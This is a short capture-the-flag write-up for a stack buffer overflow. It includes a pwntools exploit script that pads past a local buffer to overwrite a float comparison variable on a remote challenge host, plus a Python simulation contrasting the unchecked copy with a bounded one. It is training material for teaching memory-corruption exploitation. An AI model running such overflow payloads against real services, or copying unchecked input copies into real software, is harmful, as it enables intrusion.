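Address overwrite
The program runs cat /flag when v2 equals 11.28125, so we overflow v1 to overwrite v2 and set it to 11.28125.
The overflow distance is 0x30-0x4.
The hexadecimal representation of 11.28125 is 0x41348000.
exp: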
from pwn import *
host = 'node4.buuoj.cn'
port = 26014
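p = connect(host, port)
# p = process('./pwn1')
# 0x30-0x4 bytes of padding reach v2; the low 4 bytes of p64() land in v2 (little-endian)
payload = b'a' * (0x30 - 0x4) + p64(0x41348000)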
p.send(payload)
p.interactive()
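The layout described above, as an added example that is not part of the original writeup: it derives the 0x41348000 encoding and replays the payload against a simulated stack frame, once with an unchecked copy and once with a copy bounded to v1's 0x30-0x4 bytes. The frame model (v1 at rbp-0x30, v2 at rbp-0x4, a constructed saved-rbp value) and all function names are assumptions; the page does not show the binary's source.

```python
import struct

V2_OFF = 0x30 - 0x4        # v1 at rbp-0x30, v2 at rbp-0x4 (assumed layout)
RBP_OFF = 0x30             # saved rbp follows the locals
FRAME = 0x30 + 16          # locals + saved rbp + return address
SAVED_RBP = 0x7FFC11223340 # constructed sample value

def float_bits(x):
    """IEEE-754 single-precision bit pattern of x as an unsigned int."""
    return struct.unpack("<I", struct.pack("<f", x))[0]

def new_frame():
    """Fresh simulated frame: v1 zeroed, v2 = 0.0, saved rbp set."""
    frame = bytearray(FRAME)
    struct.pack_into("<f", frame, V2_OFF, 0.0)
    struct.pack_into("<Q", frame, RBP_OFF, SAVED_RBP)
    return frame

def unbounded_copy(frame, data):
    """Models an input read with no length check on v1."""
    n = min(len(data), FRAME)
    frame[:n] = data[:n]
    return frame

def bounded_copy(frame, data):
    """Hardened form: never copies more than v1's own size."""
    n = min(len(data), V2_OFF)
    frame[:n] = data[:n]
    return frame

def read_v2(frame):
    return struct.unpack_from("<f", frame, V2_OFF)[0]

def read_saved_rbp(frame):
    return struct.unpack_from("<Q", frame, RBP_OFF)[0]

# Same bytes the exp sends: padding up to v2, then an 8-byte little-endian value.
PAYLOAD = b"a" * V2_OFF + struct.pack("<Q", float_bits(11.28125))

if __name__ == "__main__":
    print(hex(float_bits(11.28125)))
    weak, safe = unbounded_copy(new_frame(), PAYLOAD), bounded_copy(new_frame(), PAYLOAD)
    print("unbounded: v2 =", read_v2(weak), "saved rbp =", hex(read_saved_rbp(weak)))
    print("bounded:   v2 =", read_v2(safe), "saved rbp =", hex(read_saved_rbp(safe)))
```

Because the value is packed as 8 bytes, its upper 4 zero bytes also overwrite the low half of the saved rbp in this model; a 4-byte pack would touch only v2.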